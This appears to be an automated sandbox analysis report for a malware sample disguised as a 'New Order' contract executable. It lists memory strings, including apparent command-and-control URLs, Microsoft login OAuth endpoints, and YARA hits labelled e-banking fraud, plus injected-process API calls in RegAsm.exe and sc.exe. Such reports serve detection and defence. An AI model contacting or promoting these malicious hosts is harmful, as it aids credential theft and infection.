                Source: sc.exe, 00000006.00000002.2979542481.00000000043A4000.00000004.10000000.00040000.00000000.sdmp, ZrTbKDhAWYKJu.exe, 00000007.00000002.2978983691.0000000002964000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2532705070.000000002A2B4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://bloodbalancecaps.shop/7n6c/?Vblddl=ePeKNPyUeLpNn1ut9QR5
                Source: ZrTbKDhAWYKJu.exe, 00000007.00000002.2977906300.00000000005DC000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.laohub10.net
                Source: ZrTbKDhAWYKJu.exe, 00000007.00000002.2977906300.00000000005DC000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.laohub10.net/dfeq/
                Source: sc.exe, 00000006.00000002.2981404488.000000000819E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: sc.exe, 00000006.00000002.2979542481.00000000049EC000.00000004.10000000.00040000.00000000.sdmp, ZrTbKDhAWYKJu.exe, 00000007.00000002.2978983691.0000000002FAC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn-bj.trafficmanager.net/?h=
                Source: sc.exe, 00000006.00000002.2981404488.000000000819E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: sc.exe, 00000006.00000002.2981404488.000000000819E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: sc.exe, 00000006.00000002.2981404488.000000000819E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: sc.exe, 00000006.00000002.2981404488.000000000819E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: sc.exe, 00000006.00000002.2981404488.000000000819E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: sc.exe, 00000006.00000002.2981404488.000000000819E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: sc.exe, 00000006.00000003.2421392598.0000000003294000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.li
                Source: sc.exe, 00000006.00000003.2421392598.0000000003294000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth
                Source: sc.exe, 00000006.00000003.2421392598.0000000003294000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: sc.exe, 00000006.00000002.2977665984.0000000003280000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000006.00000003.2421392598.0000000003294000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: sc.exe, 00000006.00000003.2421392598.0000000003294000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf
                Source: sc.exe, 00000006.00000003.2421392598.0000000003294000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2/z
                Source: sc.exe, 00000006.00000003.2421392598.0000000003294000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: sc.exe, 00000006.00000003.2421392598.0000000003294000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
                Source: sc.exe, 00000006.00000002.2977665984.0000000003280000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000006.00000003.2421392598.0000000003294000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033a
                Source: sc.exe, 00000006.00000003.2421392598.0000000003294000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: sc.exe, 00000006.00000002.2977665984.0000000003280000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000006.00000003.2421392598.0000000003294000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: sc.exe, 00000006.00000003.2420290466.0000000008175000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: sc.exe, 00000006.00000002.2981404488.000000000819E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/

                E-Banking Fraud

                barindex
                Source: Yara matchFile source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.2978480170.0000000003630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2240548681.00000000025C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2977494208.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2239985044.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2978393331.00000000035C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2978629154.00000000025F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2241932701.0000000002B70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Source: initial sampleStatic PE information: Filename: New Order - RCII900718_Contract Drafting.exe
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess Stats: CPU usage > 49%
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0042CDA3 NtClose,1_2_0042CDA3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02892B60 NtClose,LdrInitializeThunk,1_2_02892B60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02892C70 NtFreeVirtualMemory,LdrInitializeThunk,1_2_02892C70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02892DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_02892DF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028935C0 NtCreateMutant,LdrInitializeThunk,1_2_028935C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02894340 NtSetContextThread,1_2_02894340
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02894650 NtSuspendThread,1_2_02894650
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02892AB0 NtWaitForSingleObject,1_2_02892AB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02892AD0 NtReadFile,1_2_02892AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02892AF0 NtWriteFile,1_2_02892AF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02892B80 NtQueryInformationFile,1_2_02892B80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02892BA0 NtEnumerateValueKey,1_2_02892BA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02892BE0 NtQueryValueKey,1_2_02892BE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02892BF0 NtAllocateVirtualMemory,1_2_02892BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02892E80 NtReadVirtualMemory,1_2_02892E80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02892EA0 NtAdjustPrivilegesToken,1_2_02892EA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02892EE0 NtQueueApcThread,1_2_02892EE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02892E30 NtWriteVirtualMemory,1_2_02892E30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02892F90 NtProtectVirtualMemory,1_2_02892F90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02892FA0 NtQuerySection,1_2_02892FA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02892FB0 NtResumeThread,1_2_02892FB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02892FE0 NtCreateFile,1_2_02892FE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02892F30 NtCreateSection,1_2_02892F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02892F60 NtCreateProcessEx,1_2_02892F60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02892CA0 NtQueryInformationToken,1_2_02892CA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02892CC0 NtQueryVirtualMemory,1_2_02892CC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02892CF0 NtOpenProcess,1_2_02892CF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02892C00 NtQueryInformationProcess,1_2_02892C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02892C60 NtCreateKey,1_2_02892C60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02892DB0 NtEnumerateKey,1_2_02892DB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02892DD0 NtDelayExecution,1_2_02892DD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02892D00 NtSetInformationFile,1_2_02892D00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02892D10 NtMapViewOfSection,1_2_02892D10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02892D30 NtUnmapViewOfSection,1_2_02892D30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02893090 NtSetValueKey,1_2_02893090
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02893010 NtOpenDirectoryObject,1_2_02893010
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028939B0 NtGetContextThread,1_2_028939B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02893D10 NtOpenProcessToken,1_2_02893D10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02893D70 NtOpenThread,1_2_02893D70
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A04340 NtSetContextThread,LdrInitializeThunk,6_2_03A04340
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A04650 NtSuspendThread,LdrInitializeThunk,6_2_03A04650
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A02BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_03A02BA0
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A02BE0 NtQueryValueKey,LdrInitializeThunk,6_2_03A02BE0
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A02BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_03A02BF0
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A02B60 NtClose,LdrInitializeThunk,6_2_03A02B60
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A02AF0 NtWriteFile,LdrInitializeThunk,6_2_03A02AF0
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A02AD0 NtReadFile,LdrInitializeThunk,6_2_03A02AD0
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A02FB0 NtResumeThread,LdrInitializeThunk,6_2_03A02FB0
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A02FE0 NtCreateFile,LdrInitializeThunk,6_2_03A02FE0
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A02F30 NtCreateSection,LdrInitializeThunk,6_2_03A02F30
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A02E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_03A02E80
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A02EE0 NtQueueApcThread,LdrInitializeThunk,6_2_03A02EE0
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A02DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_03A02DF0
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A02DD0 NtDelayExecution,LdrInitializeThunk,6_2_03A02DD0
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A02D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_03A02D30
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A02D10 NtMapViewOfSection,LdrInitializeThunk,6_2_03A02D10
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A02CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_03A02CA0
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A02C60 NtCreateKey,LdrInitializeThunk,6_2_03A02C60
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A02C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_03A02C70
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A035C0 NtCreateMutant,LdrInitializeThunk,6_2_03A035C0
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A039B0 NtGetContextThread,LdrInitializeThunk,6_2_03A039B0
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A02B80 NtQueryInformationFile,6_2_03A02B80
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A02AB0 NtWaitForSingleObject,6_2_03A02AB0
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A02FA0 NtQuerySection,6_2_03A02FA0
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A02F90 NtProtectVirtualMemory,6_2_03A02F90
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A02F60 NtCreateProcessEx,6_2_03A02F60
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A02EA0 NtAdjustPrivilegesToken,6_2_03A02EA0
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A02E30 NtWriteVirtualMemory,6_2_03A02E30
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A02DB0 NtEnumerateKey,6_2_03A02DB0
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A02D00 NtSetInformationFile,6_2_03A02D00
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A02CF0 NtOpenProcess,6_2_03A02CF0
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A02CC0 NtQueryVirtualMemory,6_2_03A02CC0
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A02C00 NtQueryInformationProcess,6_2_03A02C00
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A03090 NtSetValueKey,6_2_03A03090
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A03010 NtOpenDirectoryObject,6_2_03A03010
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A03D10 NtOpenProcessToken,6_2_03A03D10
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A03D70 NtOpenThread,6_2_03A03D70
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_02F39640 NtCreateFile,6_2_02F39640
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_02F397B0 NtReadFile,6_2_02F397B0
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_02F39AC0 NtAllocateVirtualMemory,6_2_02F39AC0
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_02F398B0 NtDeleteFile,6_2_02F398B0
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_02F39960 NtClose,6_2_02F39960
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exeCode function: 0_2_00F13EBC0_2_00F13EBC
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exeCode function: 0_2_00F12B780_2_00F12B78
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exeCode function: 0_2_00F12B680_2_00F12B68
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00418C131_2_00418C13
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004031901_2_00403190
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0042F3C31_2_0042F3C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004104031_2_00410403
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00416E131_2_00416E13
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0040E6131_2_0040E613
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004106231_2_00410623
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0040E7571_2_0040E757
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0040E75F1_2_0040E75F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0040E7631_2_0040E763
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004027D01_2_004027D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028E02C01_2_028E02C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_029002741_2_02900274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_029203E61_2_029203E6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0286E3F01_2_0286E3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0291A3521_2_0291A352
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028F20001_2_028F2000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_029141A21_2_029141A2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_029201AA1_2_029201AA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_029181CC1_2_029181CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028501001_2_02850100
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028FA1181_2_028FA118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028E81581_2_028E8158
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0287C6E01_2_0287C6E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0285C7C01_2_0285C7C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028847501_2_02884750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028607701_2_02860770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0290E4F61_2_0290E4F6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_029044201_2_02904420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_029124461_2_02912446
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_029205911_2_02920591
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028605351_2_02860535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0285EA801_2_0285EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02916BD71_2_02916BD7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0291AB401_2_0291AB40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028468B81_2_028468B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0288E8F01_2_0288E8F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028628401_2_02862840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0286A8401_2_0286A840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028629A01_2_028629A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0292A9A61_2_0292A9A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028769621_2_02876962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0291CE931_2_0291CE93
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02872E901_2_02872E90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0291EEDB1_2_0291EEDB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0291EE261_2_0291EE26
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02860E591_2_02860E59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028DEFA01_2_028DEFA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02852FC81_2_02852FC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02902F301_2_02902F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028A2F281_2_028A2F28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02880F301_2_02880F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028D4F401_2_028D4F40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02900CB51_2_02900CB5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02850CF21_2_02850CF2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02860C001_2_02860C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02878DBF1_2_02878DBF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0285ADE01_2_0285ADE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0286AD001_2_0286AD00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028FCD1F1_2_028FCD1F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028652A01_2_028652A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0287B2C01_2_0287B2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0287D2F01_2_0287D2F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_029012ED1_2_029012ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028A739A1_2_028A739A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0291132D1_2_0291132D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0284D34C1_2_0284D34C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028670C01_2_028670C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0290F0CC1_2_0290F0CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0291F0E01_2_0291F0E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_029170E91_2_029170E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0286B1B01_2_0286B1B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0289516C1_2_0289516C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0284F1721_2_0284F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0292B16B1_2_0292B16B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_029116CC1_2_029116CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028A56301_2_028A5630
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0291F7B01_2_0291F7B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0291F43F1_2_0291F43F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028514601_2_02851460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028FD5B01_2_028FD5B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_029295C31_2_029295C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_029175711_2_02917571
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028FDAAC1_2_028FDAAC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028A5AA01_2_028A5AA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02901AA31_2_02901AA3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0290DAC61_2_0290DAC6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02917A461_2_02917A46
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0291FA491_2_0291FA49
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028D3A6C1_2_028D3A6C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0287FB801_2_0287FB80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0289DBF91_2_0289DBF9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028D5BF01_2_028D5BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0291FB761_2_0291FB76
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028638E01_2_028638E0
